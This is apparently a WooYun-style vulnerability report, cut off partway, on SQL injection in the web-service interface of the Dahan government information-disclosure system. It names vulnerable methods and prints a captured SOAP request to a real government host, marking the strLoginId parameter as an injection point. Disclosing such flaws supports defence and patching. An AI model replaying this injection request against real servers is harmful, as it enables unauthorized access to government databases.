大汉政府信息公开多处SQL注入一(附100个案例)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 大汉政府信息公开多处SQL注入一(附100个案例) ### 详细说明: 依然是webservice漏洞,漏洞存在于 /xxgk/services/WSSync_xxgk?wsdl 该WSSync_xxgk服务的多个方法,多个参数存在严重漏洞,且该漏洞普遍存在。 wsGetWeb getClientIpAxis wsGetColumn wsGetColumnStyle wsSynchronize wsSynchronizeWithPath wsSync 上述方法的多个参数均存在漏洞,随便选取一个方法进行测试 /xxgk/services/WSSync_xxgk?wsdl wsGetColumn方法 用WSockExpert v0.7抓包,并保存为wooyun.txt ``` POST /xxgk/services/WSSync_xxgk?wsdl HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 222 Host: xxgk.lyg.gov.cn Connection: Keep-Alive User-Agent: google robots <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:rec="http://receive.blf.jcms"> <soapenv:Header/> <soapenv:Body> <rec:wsGetColumn soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <strWebId xsi:type="xsd:string">1</strWebId> <strLoginId xsi:type="xsd:string">1*</strLoginId>...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息